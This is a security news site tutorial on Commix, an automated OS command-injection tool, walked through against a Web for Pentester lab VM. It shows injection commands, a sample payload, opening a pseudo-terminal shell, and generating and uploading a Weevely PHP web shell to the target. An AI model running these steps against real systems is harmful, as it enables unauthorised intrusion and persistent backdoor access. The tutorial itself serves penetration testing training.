Wednesday, November 13, 2024
HomeExploitation ToolsCommix – Automated All-in-One OS Command Injection and Exploitation Tool

Commix – Automated All-in-One OS Command Injection and Exploitation Tool

Published on

Malware protection

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, by web developers, penetration testers, or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks.

By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. It is written in Python programming language.

Requirements and Installation

Requires version 2.6.x and above to run this tool, it can be downloaded from the GitHub.

- Advertisement - SIEM as a Service
root@kali:~# git clone https://github.com/commixproject/commix.git

Also, can be installed through Ubuntu’s APT (Advanced Packaging Tool)

root@kali:~# apt-get install commix

Supported Platforms

  • Linux
  • Mac OS X
  • Windows (experimental)

Classic Injection

Step1: Download and mount the Pentester lab exercise Web for Pentester and then you can reach the labs from your Kali machine browser Ex: http://192.168.169.130

Step 2: You can find command line Injection exercises.

Commix – Automated All-in-One OS Command Injection and Exploitation Tool

Step 3: Now in Kali type commix and copy the path for example 1.

INJECT_HERE – It will try to inject various queries here.

root@kali:~# commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE”
Commix – Automated All-in-One OS Command Injection and Exploitation Tool
                                                               Injection attack

It checks for various payloads and successful with Payload: ;echo WIBYAT$((24+78))$(echo WIBYAT)WIBYAT.

Then it asks to connect with a terminal shell Do you want a Pseudo-Terminal shell? [Y/n/q] > By pressing “y” we can get the terminal access for the machine.

Blind Injection

commix –url=”http://192.168.169.130/commandexec/example1.php?ip=127.0.0.1″ –os=U –technique=”tf” -v 1
Commix – Automated All-in-One OS Command Injection and Exploitation Tool
                                                      Blind Injection

Injecting Weevely PHP web shell

Step 1: Create a payload with weevely, if weevely is not installed you can use apt-get install weevely.

Step 2: Launch weevely and generate a PHP web shell.

root@kali:~# weevelyroot@kali:~# weevely generate commix /root/Desktop/Commix/shellexploit.php
Commix – Automated All-in-One OS Command Injection and Exploitation Tool
PHP Shell with Weevely

Step 3: To upload the file in the remote host, use the following command.

–file-write  = File to write in the destination host

–file-dest  = Filepath to write or Upload

commix –url=”http://192.168.169.130/commandexec/example1.php?ip=INJECT_HERE” –file-write=’/root/Desktop/Commix/shellexploit.php’ –file-dest=”/var/www/upload/images/”

Also Read:

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

Chrome 131 Released with the Fix for Multiple Vulnerabilities

The Chrome team has officially announced the release of Chrome 131 for Windows, Mac,...

Ivanti Warns of Critical Vulnerabilities in Connect Secure, Policy Secure & Secure Access

Ivanti, the well-known provider of IT asset and service management solutions, has issued critical...

Thousands of EOL D-Link Routers Vulnerable to Password Change Attacks

In a critical security disclosure, it has been revealed that thousands of end-of-life (EOL)...

Crafting A Successful Crypto Investment Thesis: Strategies For Long-Term Growth 

Diving into the world of crypto investments has been one of the most exhilarating...

Free Webinar

Protect Websites & APIs from Malware Attack

Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting.

Join us for an insightful webinar featuring Vivek Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.

Discussion points

Scan DOM, internal links, and JavaScript libraries for hidden malware.
Detect website defacements in real time.
Protect your brand by monitoring for potential blacklisting.
Prevent malware from infiltrating your server and cloud infrastructure.

More like this

Embargo Ransomware Actors Abuses Safe Mode To Disable Security Solutions

In July 2024, the ransomware group Embargo targeted US companies using the malicious loader...

SMB Force-Authentication Vulnerability Impacts All OPA Versions For Windows

Open Policy Agent (OPA) recently patched a critical vulnerability that could have exposed NTLM...

Hackers Exploiting Selenium Grid Tool To Deploy Exploit Kit & Proxyjacker

Two campaigns targeting Selenium Grid's default lack of authentication are underway, as threat actors...